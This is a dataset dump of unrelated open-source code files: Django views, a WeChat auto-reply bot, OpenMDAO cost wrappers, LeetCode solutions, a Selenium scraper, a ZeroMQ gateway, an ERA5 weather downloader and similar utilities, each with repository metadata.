'teachers.html',{'teachers':teachers})\n\n\n@login_required(login_url='/home/login')\n@allowed_users(allowed_roles=['student'])\ndef myclasses(request):\n\tteachers=Tutor.objects.filter(friends=request.user.stud)\n\treturn render(request, 'myclasses.html',{'teachers':teachers})\n\n\n@login_required(login_url='/home/login')\n@allowed_users(allowed_roles=['student'])\ndef view_lecture(request,id):\n\ttry:\n\t\tteacher=Tutor.objects.get(id=id, friends=request.user.stud)\n\t\texams=Exam.objects.filter(teacher=teacher).order_by('date_created')\n\t\treturn render(request, 'view_lecture.html',{'exams':exams,'teacher':teacher})\n\texcept:\n\t\treturn redirect('/shome/myclasses/') \n\n\n@login_required(login_url='/home/login')\n@allowed_users(allowed_roles=['student'])\ndef student_assignment_list(request):\n\tteachers=Tutor.objects.filter( friends=request.user.stud)\n\tassignments=Assignment_ques.objects.filter(teacher__in 
=teachers).order_by('date_created')\n\treturn render(request, 'student_assignment_list.html',{'assignments':assignments})\n\t\n\n@login_required(login_url='/home/login')\n@allowed_users(allowed_roles=['student'])\ndef assignment_ans_form(request,id):\n\tteachers=Tutor.objects.filter(friends=request.user.stud)\n\tassignment_q=Assignment_ques.objects.get(id=id)\n\tif assignment_q.teacher in teachers:\n\t\tform = Assignment_ans_Form()\n\t\tif request.method == 'POST':\n\t\t\tform = Assignment_ans_Form(request.POST)\n\t\t\tif form.is_valid():\n\t\t\t\tform.save()\n\t\t\t\tassignment_q.students.add(request.user.stud)\n\t\t\t\treturn redirect('/shome/assignment/')\n\t\tcontext ={'form':form}\n\t\treturn render(request, 'assignment_ans_form.html',context)\n\telse:\n\t\treturn redirect('/shome/assignment/') \n\n\n\n\n@login_required(login_url='/home/login')\n@allowed_users(allowed_roles=['student'])\ndef student_profile_update(request):\n\tform = StudentProfileForm(instance=request.user.stud)\n\tif request.method == 'POST':\n\t\tform = StudentProfileForm(request.POST,instance=request.user.stud)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('/shome/profile')\n\t\n\tcontext ={'form':form}\n\treturn render(request, 'student_profile_form.html',context)\n\n\n\n@login_required(login_url='/home/login')\n@allowed_users(allowed_roles=['student'])\ndef shome(request):\n\tteachers=Tutor.objects.filter(friends=request.user.stud)\n\trequests = FriendRequest.objects.filter(from_user=request.user.stud)\n\tassignments=Assignment_ans.objects.filter(student =request.user.stud)\n\t\n\tno_of_request=requests.count()\n\tno_of_class=teachers.count()\n\tno_of_assignment=assignments.count()\n\t\n\t\n\tcontext={'no_of_assignment':no_of_assignment,\n\t\t\t\t'no_of_request':no_of_request,\n\t\t\t\t'no_of_class':no_of_class\n\t\t\t\t}\n\n\treturn render(request, 'student_dashboard.html',context)","sub_path":"student/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"549792612","text":"import hashlib\n\nfrom . 
import DB, app\n\n\nclass TrackedDownload(object):\n\n MAX_USE = 3\n\n def __init__(self, **data):\n self.token = None\n for key, value in data.items():\n setattr(self, key, value)\n if not self.token:\n salt = app.config['SECRET_KEY']\n string = self.email.encode() + self.area.encode() + salt.encode()\n self.token = hashlib.sha512(string).hexdigest()[:8]\n\n def save(self):\n DB.commit('INSERT INTO tracked_download '\n '(first_name, last_name, email, company, token, area) '\n 'VALUES (?, ?, ?, ?, ?, ?)',\n [self.first_name, self.last_name, self.email, self.company,\n self.token, self.area])\n\n def use(self):\n DB.commit('UPDATE tracked_download SET used=used+1 '\n 'WHERE used180): #有没回的信息,且时间超过30秒,需要自动发送\n self.send_msg_by_uid(u'正在忙,请稍后联系 (本条为自动回复)', self.weixinid)\n self.send_msg_by_uid(u'本功能为本人编写,可能存在漏发,误发,迟发等一系列问题,敬请谅解,有急事可拨打电话18586108602。代码改编自wxBot,源代码已在github上更新。', self.weixinid)\n self.shifouxuyao=False\n except :\n print(\"出错了\")\n #print shifouxuyao,lastest_receive_time\n print(\"经历了一轮schedule\")+str(time.time())\n time.sleep(10)\n\n\n\ndef main():\n shifouxuyao=False\n weixinid=0\n lastest_receive_time=time.time()\n bot = MyWXBot()\n bot.DEBUG = True\n bot.conf['qr'] = 'png'\n bot.run()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"142395607","text":"from openmdao.core.explicitcomponent import ExplicitComponent\nimport numpy as np\n\n\nclass CostModelComponent(ExplicitComponent):\n def __init__(self, input_keys, n_wt, cost_function, cost_gradient_function=None,\n output_key=\"Cost\", output_unit=\"\", additional_output=[]):\n super().__init__()\n assert isinstance(n_wt, int), n_wt\n self.input_keys = list(input_keys)\n self.cost_function = cost_function\n self.cost_gradient_function = cost_gradient_function\n self.n_wt = n_wt\n self.output_key = output_key\n self.output_unit = output_unit\n self.additional_output = additional_output\n\n def setup(self):\n for i in self.input_keys:\n if isinstance(i, tuple) and len(i) == 2:\n self.add_input(i[0], val=i[1])\n else:\n self.add_input(i, val=np.zeros(self.n_wt))\n self.add_output('cost', val=0.0)\n self.add_output(self.output_key, val=0.0)\n for key, val in self.additional_output:\n self.add_output(key, val=val)\n\n input_keys = list([(i, i[0])[isinstance(i, tuple)] for i in self.input_keys])\n if self.cost_gradient_function:\n self.declare_partials('cost', input_keys)\n else:\n # Finite difference all partials.\n self.declare_partials('cost', input_keys, method='fd')\n self.declare_partials(self.output_key, input_keys)\n\n def compute(self, inputs, outputs):\n if self.additional_output:\n c, additional_output = self.cost_function(**inputs)\n for k, v in additional_output.items():\n outputs[k] = v\n else:\n c = self.cost_function(**inputs)\n outputs['cost'] = c\n outputs[self.output_key] = c\n\n def compute_partials(self, inputs, J):\n if self.cost_gradient_function:\n for k, dCostdk in zip(self.input_keys,\n self.cost_gradient_function(**inputs)):\n if dCostdk is not None:\n J['cost', k] = dCostdk\n J[self.output_key, k] = dCostdk\n\n\nclass IncomeModelComponent(CostModelComponent):\n\n def compute(self, inputs, outputs):\n CostModelComponent.compute(self, inputs, outputs)\n outputs['cost'] *= -1\n\n def compute_partials(self, inputs, J):\n if self.cost_gradient_function:\n CostModelComponent.compute_partials(self, inputs, J)\n for k in 
dict(inputs).keys():\n J['cost', k] *= -1\n\n\nclass AEPCostModelComponent(IncomeModelComponent):\n def __init__(self, input_keys, n_wt, cost_function, cost_gradient_function=None, output_unit=\"\", additional_output=[]):\n IncomeModelComponent.__init__(self, input_keys, n_wt, cost_function,\n cost_gradient_function=cost_gradient_function,\n output_key=\"AEP\", output_unit=output_unit,\n additional_output=additional_output)\n","sub_path":"topfarm/cost_models/cost_model_wrappers.py","file_name":"cost_model_wrappers.py","file_ext":"py","file_size_in_byte":3028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"558090773","text":"\"\"\"\n138. Copy List with Random Pointer\n\nA linked list is given such that each node contains an additional random pointer which could point to any node in the list or null.\n\nReturn a deep copy of the list.\n\n\n\n\"\"\"\n\n\n# Definition for singly-linked list with a random pointer.\n# class RandomListNode(object):\n# def __init__(self, x):\n# self.label = x\n# self.next = None\n# self.random = None\n\nclass Solution(object):\n def __init__(self):\n self.visited = {}\n\n def copyRandomList(self, head):\n \"\"\"\n :type head: RandomListNode\n :rtype: RandomListNode\n \"\"\"\n if not head: return head\n old = head\n new = RandomListNode(old.label)\n self.visited[old] = new\n while old:\n new.random = self.clonenode(old.random)\n new.next = self.clonenode(old.next)\n new = new.next\n old = old.next\n return self.visited[head]\n\n def clonenode(self, node):\n if node:\n if node in self.visited:\n return self.visited[node]\n else:\n self.visited[node] = RandomListNode(node.label)\n return self.visited[node]\n return None\n\n#cpp, rewrite, dfs\n\n'''\n/**\n * Definition for singly-linked list with a random pointer.\n * struct RandomListNode {\n * int label;\n * RandomListNode *next, *random;\n * RandomListNode(int x) : label(x), next(NULL), random(NULL) {}\n * };\n */\nclass Solution {\n unordered_map m;\npublic:\n RandomListNode *copyRandomList(RandomListNode *head) {\n if (head == nullptr) return head;\n if (m.find(head) != m.end()) return m[head];\n RandomListNode* node = new RandomListNode(head->label); \n m[head] = node;\n node->next = copyRandomList(head->next);\n node->random = copyRandomList(head->random);\n return node;\n \n }\n};\n'''\n\n\n# 2020/04/29, similar to lc 133\n\n'''\nRuntime: 36 ms, faster than 60.71% of Python3 online submissions for Copy List with Random Pointer.\nMemory Usage: 14.2 MB, less than 100.00% of Python3 online submissions for Copy List with Random Pointer.\n'''\n\n\n\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, x: int, next: 'Node' = None, random: 'Node' = None):\n self.val = int(x)\n self.next = next\n self.random = random\n\"\"\"\n\n\nclass Solution:\n def copyRandomList(self, head: 'Node') -> 'Node':\n if not head: return None\n copy = self.make_copy(head)\n dummy = head\n while head:\n if head.random: copy[head].random = copy[head.random]\n if head.next: copy[head].next = copy[head.next]\n head = head.next\n return copy[dummy]\n\n def make_copy(self, head):\n m = {}\n while head:\n m[head] = Node(head.val)\n head = head.next\n return m","sub_path":"0138. Copy List with Random Pointer.py","file_name":"0138. 
Copy List with Random Pointer.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"546922263","text":"\"\"\"\r\nAnalysis of emotional tendency\r\n调用百度NLP接口实现情感倾向分析\r\n\"\"\"\r\n\r\nfrom aip import AipNlp\r\nimport openpyxl\r\nimport os\r\nimport time\r\n\r\n# baidu api information\r\nAPP_ID = ''\r\nAPI_KEY = ''\r\nSECRET_KEY = ''\r\nclient = AipNlp(APP_ID, API_KEY, SECRET_KEY)\r\n\r\n# set sleep time to use baidu api\r\ndef sleeptime(hour,min,sec):\r\n return hour*3600 + min*60 + sec\r\n\t\t\r\n# 调用百度NLP的评论情感分析API,获得情感极性分类结果\r\ndef get_sentiments(text):\r\n\tresult = []\r\n\ttry:\r\n\t\tsentiment_result = client.sentimentClassify(text)['items'][0]\r\n\t\tpositive_prob = sentiment_result['positive_prob'] #表示属于积极类别的概率\r\n\t\tnegative_prob = sentiment_result['negative_prob'] #表示属于消极类别的概率\r\n\t\tconfidence = sentiment_result['confidence'] #表示分类的置信度\r\n\t\tsentiment = sentiment_result['sentiment'] #表示情感极性分类结果, 0:负向,1:中性,2:正向\r\n\t\tresult = [positive_prob,negative_prob,confidence,sentiment]\r\n\t# 异常处理,此处忽略\r\n\texcept Exception as e:\r\n\t\tpass\r\n\treturn result\r\n\r\n# 对excel中的评论逐条处理并将获得的情感分析结果保存到原文件中\r\ndef process_excel(file_path):\r\n\tdata = openpyxl.load_workbook(file_path)\r\n\ttable = data.active\r\n\tnrows = table.max_row\r\n\tfor i in range(2,nrows+1):\r\n\t\t# 拼接文本位置\r\n\t\ttext_location = 'C'+str(i)\r\n\t\t# 提取文本内容\r\n\t\ttext = table[text_location].value\r\n\t\tif text:\r\n\t\t\t# 百度评论分类\r\n\t\t\tresult = get_sentiments(text)\r\n\t\t\t# 保存结果\r\n\t\t\tif result:\r\n\t\t\t\ttable.cell(row=int(i), column=5).value = result[0]\r\n\t\t\t\ttable.cell(row=int(i), column=6).value = result[1]\r\n\t\t\t\ttable.cell(row=int(i), column=7).value = result[2]\r\n\t\t\t\ttable.cell(row=int(i), column=8).value = result[3]\r\n\tdata.save(file_path)\r\n\r\n\r\ndef main():\r\n\tsecond = sleeptime(0,0,2)\r\n\tfilefolder = r''\r\n\tfor file in os.listdir(filefolder):\r\n\t\t# only process excel file\r\n\t\tprint(os.path.splitext(file)[-1])\r\n\t\tif os.path.splitext(file)[-1] in ['.xlsx']:\r\n\t\t file_path = os.path.join(filefolder, file)\r\n\t\t process_excel(file_path)\r\n\t\t time.sleep(second) #随机休眠\r\n\t\t \r\n\r\nif __name__ == '__main__':\r\n\tmain()","sub_path":"emotional _tendency_analysis.py","file_name":"emotional _tendency_analysis.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"216518186","text":"#covid19_get.py for Mac\n#Author: Masafumi Hiura\n#This code access covid19 web site of toyokeizai.net in Japan, and get screenshot of the web page.\n#Japanese site is https://toyokeizai.net/sp/visual/tko/covid19/\n#English site is https://toyokeizai.net/sp/visual/tko/covid19/en.html\n#You need to install selenium by using pip before execute this code.\n#You need to download chromedriver for your OS.\n#This code see select tag(id=\"select-prefecture\") of html, and get screenshot of the result of prefecture one by one.\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.select import Select\nimport time\nimport datetime\n\ndt_now = datetime.datetime.now()\ndt_now_s = dt_now.strftime('%Y%m%d%H%M%S')\n\noptions = webdriver.ChromeOptions()\noptions.add_argument('--headless')\noptions.add_argument('--no-sandbox')\noptions.add_argument('--disable-dev-shm-usage')\ndriver = 
webdriver.Chrome('./chromedriver_macm1',options=options)\n\ndriver.get('https://toyokeizai.net/sp/visual/tko/covid19/')\nw = driver.execute_script(\"return document.body.scrollWidth;\")\nh = driver.execute_script(\"return document.body.scrollHeight;\")\ndriver.set_window_size(w, h)\ndriver.execute_script('window.scrollTo(0, document.body.scrollWidth);')\ndriver.execute_script('window.scrollTo(0, document.body.scrollHeight);')\n#driver.execute_script(\"document.body.style.zoom='30%'\")\ndropdown = driver.find_element_by_id('select-prefecture')\nselect = Select(dropdown)\n\nall_options = select.options\nfor option in all_options:\n print(option.text)\n print(option.get_attribute('outerHTML'))\n print(option.get_attribute('value'))\n print('----------------------------')\n select.select_by_value(option.get_attribute('value')) #\n driver.save_screenshot(\"/Users/masafumihiura/selenium/screen_shot/\" + dt_now_s + \"_\" + option.get_attribute('value') + \".png\")\n time.sleep(2)\n\ndriver.quit()","sub_path":"covid19_get_macm1.py","file_name":"covid19_get_macm1.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"388583059","text":"import socket\n\n\nHOST = socket.gethostbyname(socket.gethostname())\nPORT = 5050\n\n\nwith socket.socket(socket.AF_INET,socket.SOCK_STREAM) as s:\n s.bind((HOST,PORT))\n s.listen()\n conn, addr = s.accept()\n with conn:\n print('connected by', addr)\n while True:\n data = conn.recv(1024).decode('UTF-8')\n if not data:\n break\n\n string1 = (\"Message in Uppercase: \" + data.upper())\n arr = bytes(string1, 'utf-8')\n conn.sendall(arr)","sub_path":"Q2server.py","file_name":"Q2server.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"363452201","text":"# -*- coding: utf-8 -*-\n\ntry:\n # noinspection PyUnresolvedReferences\n from urllib.parse import urljoin\nexcept ImportError:\n # noinspection PyUnresolvedReferences\n from urlparse import urljoin\n\n\nclass NavigationProperty(object):\n \"\"\"\n A Property-like object for marking relationships between entities, but does\n not inherit from PropertyBase.\n \"\"\"\n def __init__(self, name, entitycls, collection=False, foreign_key=None):\n from odata.property import PropertyBase\n self.name = name\n self.entitycls = entitycls\n self.is_collection = collection\n if isinstance(foreign_key, PropertyBase):\n self.foreign_key = foreign_key.name\n else:\n self.foreign_key = foreign_key\n\n def __repr__(self):\n return u''.format(self.entitycls)\n\n def instances_from_data(self, raw_data):\n if self.is_collection:\n return [self.entitycls.__new__(self.entitycls, from_data=d) for d in raw_data]\n else:\n return self.entitycls.__new__(self.entitycls, from_data=raw_data)\n\n def _get_parent_cache(self, instance):\n es = instance.__odata__\n ic = es.nav_cache\n if self.name not in ic:\n cache = {}\n ic[self.name] = cache\n else:\n cache = ic[self.name]\n return cache\n\n def __set__(self, instance, value):\n \"\"\"\n :type instance: odata.entity.EntityBase\n \"\"\"\n cache = self._get_parent_cache(instance)\n if self.is_collection:\n cache['collection'] = value\n else:\n cache['single'] = value\n instance.__odata__.set_property_dirty(self)\n\n def __get__(self, instance, owner):\n \"\"\"\n :type instance: odata.entity.EntityBase\n \"\"\"\n if instance is None:\n return self\n\n es = instance.__odata__\n parent_url = es.instance_url\n 
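        # NOTE (added): an entity with no instance URL has never been saved to
        # the service, so the branch below can only serve navigation values
        # from the local cache; no GET request is possible for it yet.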
new_object = parent_url is None\n cache = self._get_parent_cache(instance)\n\n if new_object:\n if self.is_collection:\n return cache.get('collection', [])\n return cache.get('single', None)\n\n parent_url += '/'\n url = urljoin(parent_url, self.name)\n cnx = self.entitycls.__odata_connection__\n\n if self.is_collection:\n if 'collection' not in cache:\n raw_data = cnx.execute_get(url)\n if raw_data:\n cache['collection'] = self.instances_from_data(raw_data['value'])\n else:\n cache['collection'] = []\n return cache['collection']\n else:\n if 'single' not in cache:\n raw_data = cnx.execute_get(url)\n if raw_data:\n cache['single'] = self.instances_from_data(raw_data)\n else:\n cache['single'] = None\n return cache['single']\n","sub_path":"odata/navproperty.py","file_name":"navproperty.py","file_ext":"py","file_size_in_byte":2947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"123321218","text":"__author__ = 'user'\nimport time\nimport logging\nimport datetime\nfrom logging import handlers\nimport multiprocessing as mp\nimport signal\nimport zmq\n\nimport worker_api\n\nclass Killer:\n def __init__(self, logger):\n self.logger = logger\n signal.signal(signal.SIGTERM, self.signal_handler)\n signal.signal(signal.SIGINT, self.signal_handler)\n self.exit_now = False\n\n def signal_handler(self, signum, frame):\n self.logger.info('Got signal')\n context = zmq.Context()\n controller = context.socket(zmq.PUB)\n controller.bind('tcp://*:33304')\n time.sleep(1)\n controller.send('TERM')\n self.exit_now = True\n self.logger.info('Signals sent to worker')\n\n\ndef set_logger():\n file_name = '/opt/pokerist/processor/gate_logs/gate_%s.log' % str(datetime.datetime.now().strftime(\"%Y_%m_%d_%H_%M_%S\"))\n gate_logger = logging.getLogger('gate_logger')\n gate_handler = handlers.TimedRotatingFileHandler(file_name, when='H')\n gate_handler.setFormatter(logging.Formatter('%(asctime)s %(levelname)s:%(message)s'))\n gate_logger.addHandler(gate_handler)\n level_main = logging.getLevelName('INFO')\n gate_logger.setLevel(level_main)\n return gate_logger\n\nif __name__ == '__main__':\n gate_logger = set_logger()\n try:\n\n context = zmq.Context()\n work = worker_api.Worker('33302')\n\n pull_bind = 'tcp://*:33300'\n receiver = context.socket(zmq.PULL)\n receiver.bind(pull_bind)\n gate_logger.info('Binded to: %s' % pull_bind)\n\n push_worker = 'tcp://*:33302'\n sender = context.socket(zmq.PUSH)\n sender.bind(push_worker)\n gate_logger.info('Binded to: %s' % push_worker)\n\n for i in range(8):\n process = mp.Process(target=work.filter_event, args=())\n process.daemon = True\n process.start()\n gate_logger.info('Worker started with pid: %s' % process.pid)\n\n current_time = time.time()\n count = 0\n\n killer = Killer(gate_logger)\n\n while killer.exit_now is False:\n\n if time.time() - current_time > 60:\n gate_logger.info('For 1 minute processed: %s rows ' % count)\n count = 0\n current_time = time.time()\n else:\n\n protobuf = receiver.recv()\n sender.send(protobuf)\n count += 1\n\n except Exception as e:\n gate_logger.exception(e.message)\n\n","sub_path":"production/gate_server.py","file_name":"gate_server.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"256386812","text":"import functools\n\n\ndef editRecursive(s: str, t: str) -> int:\n if not s:\n return len(t)\n elif not t:\n return len(s)\n\n delete_cost = editRecursive(s[:-1], t) + 1\n insert_cost = 
editRecursive(s, t[:-1]) + 1\n match_cost = editRecursive(s[:-1], t[:-1])\n if s[-1] != t[-1]:\n match_cost += 1\n\n return min(insert_cost, delete_cost, match_cost)\n\n\ndef editRecursiveBounded(s: str, t: str, limit: int) -> float:\n if limit < 0:\n return float(\"inf\")\n if not s:\n return len(t)\n elif not t:\n return len(s)\n\n delete_cost = editRecursiveBounded(s[:-1], t, limit - 1) + 1\n insert_cost = editRecursiveBounded(s, t[:-1], limit - 1) + 1\n if s[-1] == t[-1]:\n match_cost = editRecursiveBounded(s[:-1], t[:-1], limit)\n else:\n match_cost = editRecursiveBounded(s[:-1], t[:-1], limit - 1) + 1\n\n return min(insert_cost, delete_cost, match_cost)\n\n\nassert editRecursive(\"\", \"\") == 0\nassert editRecursive(\"a\", \"a\") == 0\nassert editRecursive(\"aaa\", \"aaa\") == 0\nassert editRecursive(\"aaa\", \"abb\") == 2\nassert editRecursive(\"aa\", \"bb\") == 2\nassert editRecursive(\"aa\", \"bbbb\") == 4\n\n# assert editRecursiveBounded(\"food\", \"money\", 5) == 4\n# assert editRecursiveBounded(\"algorithm\", \"altruistic\", 5) == float(\"inf\")\nassert editRecursive(\"algorithm\", \"altruistic\") == 6\nassert editRecursive(\"food\", \"money\") == 4\n\n\ndef editRecursiveDP(s: str, t: str) -> int:\n M, N = len(s) + 1, len(t) + 1\n distance = [[0 for _ in range(M)] for _ in range(N)]\n\n # Fill in the cost of the rows if the other string is empty\n for i in range(M):\n distance[0][i] = i\n for j in range(N):\n distance[j][0] = j\n\n # Now fill in the rest of the table\n for i in range(1, N):\n for j in range(1, M):\n equals = s[j - 1] == t[i - 1]\n diagonal = distance[i - 1][j - 1]\n if equals:\n distance[i][j] = diagonal\n else:\n above = distance[i - 1][j]\n left = distance[i][j - 1]\n distance[i][j] = 1 + min(diagonal, above, left)\n\n return distance[-1][-1]\n\n\n# assert editRecursiveDP(\"\", \"\") == 0\n# assert editRecursiveDP(\"a\", \"a\") == 0\n# assert editRecursiveDP(\"aaa\", \"aaa\") == 0\n# assert editRecursiveDP(\"aaa\", \"abb\") == 2\n# assert editRecursiveDP(\"aa\", \"bb\") == 2\n# assert editRecursiveDP(\"ab\", \"a\") == 1\n# assert editRecursiveDP(\"algorithm\", \"altruistic\") == 6\n# assert editRecursiveDP(\"food\", \"money\") == 4\n","sub_path":"edit_distance.py","file_name":"edit_distance.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"73810091","text":"#!/usr/bin/env python\n\"\"\"Some convenience files to grab meteorological data and convert\nto CABO format to use within WOFOST. 
So far, using ERA5\n\"\"\"\nimport datetime as dt\nimport logging\nimport optparse\nfrom collections import namedtuple\nfrom concurrent.futures import ThreadPoolExecutor\nfrom functools import partial\nfrom pathlib import Path\n\nimport cdsapi\nimport numpy as np\n\nJASMIN_ERA5 = \"/gws/nopw/j04/odanceo/public/ERA5_meteo/\"\n\nERAPARAMS = namedtuple(\n \"ERAPARAMS\", [\"ssrd\", \"mx2t\", \"mn2t\", \"tp\", \"u10\", \"v10\", \"d2m\"]\n)\nLOG = logging.getLogger(__name__)\nLOG.setLevel(logging.DEBUG)\nif not LOG.handlers:\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\n \"%(asctime)s - %(name)s - \" + \"%(levelname)s - %(message)s\"\n )\n ch.setFormatter(formatter)\n LOG.addHandler(ch)\nLOG.propagate = False\n\nHELP_TEXT = \"\"\"\nSYNOPSIS\n./era_downloader.py\nDESCRIPTION\nA program to download Copernicus data.\nEXAMPLES\n./era_downloader.py -v \\\n\n\nEXIT STATUS\n No exit status yet, can't be bothered.\nAUTHOR\n J Gomez-Dans \n See also https://github.com/NCEO-ODA/ghana_data\n\"\"\"\n\n\ndef grab_era5(month, year, output_folder, region, mylat, mylon):\n \"\"\"A function to download ERA5 Lande data for one month. Assumes\n the Copernicus Data Service API works and is properly configured.\n\n Downloaded files have names `{region}.{year}_{month}.nc`.\n\n Function checks whether the file already exists before requesting\n the data, as requesting the data takes a while.\n\n Parameters\n ----------\n month: int\n The month number\n year: int\n The year number\n output_folder : str\n The output folder where the files will be saved to.\n region: str\n Name of the region. Useful for saving the data.\n mylat : 2-tuple, 2-list\n North and South Latitudes in decimal degrees.\n mylon : float\n West and East Longitudes in decimal degrees.\n \"\"\"\n\n output_folder = Path(output_folder) / \"netcdf\"\n output_folder.mkdir(parents=True, exist_ok=True)\n output_nc_file = (\n output_folder / f\"ERA5_{region:s}.{year:d}_{month:02d}.nc\"\n )\n # This is needed to keep getting the updated ERA5 datasets\n today = dt.datetime.now()\n delta_t = today - dt.datetime(year, month, 1)\n\n if not output_nc_file.exists() or (0 <= delta_t.days <= 120):\n\n LOG.info(f\"Downloading {year}-{month}\")\n # '80/-50/-25/0', # North, West, South, East.\n area = (\n f\"{int(mylat[1]):d}/{int(mylon[0]):d}/\"\n + f\"{int(mylat[0]):d}/{int(mylon[1]):d}\"\n )\n c = cdsapi.Client()\n c.retrieve(\n \"reanalysis-era5-single-levels\",\n {\n \"format\": \"netcdf\",\n \"variable\": [\n \"10m_u_component_of_wind\",\n \"10m_v_component_of_wind\",\n \"2m_dewpoint_temperature\",\n \"2m_temperature\",\n \"evaporation\",\n \"potential_evaporation\",\n \"surface_solar_radiation_downwards\",\n \"total_precipitation\",\n \"volumetric_soil_water_layer_1\",\n \"volumetric_soil_water_layer_2\",\n \"volumetric_soil_water_layer_3\",\n \"volumetric_soil_water_layer_4\",\n ],\n \"product_type\": \"reanalysis\",\n \"year\": f\"{year:d}\",\n \"month\": f\"{month:02d}\",\n \"day\": [f\"{day:02d}\" for day in range(1, 32)],\n \"time\": [f\"{hour:02d}:00\" for hour in range(0, 24)],\n \"area\": area,\n \"format\": \"netcdf\",\n },\n output_nc_file.as_posix(),\n )\n return output_nc_file.as_posix()\n else:\n\n LOG.info(f\"Skipping {year}-{month}\")\n return None\n\n\ndef main():\n parser = optparse.OptionParser(\n formatter=optparse.TitledHelpFormatter(), usage=HELP_TEXT\n )\n parser.add_option(\n \"-v\",\n \"--verbose\",\n action=\"store_true\",\n default=False,\n help=\"verbose output\",\n )\n parser.add_option(\n 
\"-d\",\n \"--data_folder\",\n action=\"store\",\n default=JASMIN_ERA5,\n dest=\"output_folder\",\n help=\"Output folder to save data\",\n )\n parser.add_option(\n \"-r\",\n \"--region\",\n action=\"store\",\n dest=\"region\",\n default=\"Ghana\",\n help=\"Region name\",\n )\n parser.add_option(\n \"-y\",\n \"--lat\",\n action=\"store\",\n default=\"1,12\",\n type=str,\n help=\"Minimum/maximum latitude in decimal degrees.\",\n )\n parser.add_option(\n \"-x\",\n \"--lon\",\n action=\"store\",\n default=\"-4,5\",\n type=str,\n help=\"Minimum/maximum longitude in decimal degrees.\",\n )\n\n (options, args) = parser.parse_args()\n if options.verbose:\n LOG.setLevel(logging.DEBUG)\n else:\n LOG.setLevel(logging.INFO)\n\n lats = [float(x) for x in options.lat.split(\",\")]\n lons = [float(x) for x in options.lon.split(\",\")]\n min_lat = min(lats) # south\n max_lat = max(lats) # north\n min_lon = min(lons) # west\n max_lon = max(lons) # east\n start_era_download(\n options.region,\n options.output_folder,\n min_lon,\n max_lon,\n min_lat,\n max_lat,\n )\n\n\ndef start_era_download(\n region, output_folder, min_lon, max_lon, min_lat, max_lat\n):\n LOG.debug(f\"Region: {region}\")\n LOG.debug(f\"Output: {output_folder}\")\n LOG.debug(f\"Lon: {min_lon}/{max_lon}\")\n LOG.debug(f\"Lat: {min_lat}/{max_lat}\")\n today = dt.datetime.now()\n this_year = today.year\n this_month = today.month\n wrapper = partial(\n grab_era5,\n region=region,\n output_folder=output_folder,\n mylat=[min_lat, max_lat],\n mylon=[min_lon, max_lon],\n )\n\n # create a thread pool of 8 threads\n years = np.arange(2000, dt.datetime.now().year + 1).astype(np.int)\n months = np.arange(1, 13).astype(np.int)\n with ThreadPoolExecutor(max_workers=8) as executor:\n for year in years:\n for month in months:\n if year <= this_year and month <= this_month:\n executor.submit(wrapper, month, year)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"data_downloaders/era_downloader.py","file_name":"era_downloader.py","file_ext":"py","file_size_in_byte":6375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"107512050","text":"\n\"\"\"\nflux_cls\n * a lightweight wrapper around list-of-lists matrices\n * applies semantic names to rows based on header names\n * when vectorization gets too complicated, and you need (or want)\n efficient row-major iteration\n\"\"\"\nimport vengeance as ven\n\nfrom collections import namedtuple\nfrom dataclasses import dataclass\nfrom datetime import datetime\nfrom typing import Generator\nfrom typing import Union\nfrom vengeance import flux_cls\nfrom vengeance import print_runtime\nfrom vengeance import print_performance\nfrom vengeance import is_date\nfrom vengeance.util.text import vengeance_message\nfrom vengeance.classes.flux_row_cls import flux_row_cls\n\nfrom root.examples import share\n\nprofiler = share.resolve_profiler_function()\n\n\n@print_runtime\ndef main():\n # print(vengeance_message('vengeance {}, {}'.format(ven.__version__, ven.__release__)))\n\n flux = instantiate_flux(num_rows=50,\n num_cols=10,\n len_values=5)\n\n iterate_flux_rows(flux)\n iterate_primitive_rows(flux)\n\n flux_aggregation_methods(flux)\n flux_sort_and_filter_methods(flux)\n\n flux_row_methods(flux)\n flux_jagged_rows(flux)\n flux_column_methods(flux)\n flux_column_values(flux)\n\n flux_join()\n\n write_to_file(flux)\n read_from_file()\n\n # read_from_excel()\n # write_to_excel(flux)\n\n flux_subclass()\n\n # attribute_access_performance(flux)\n\n 
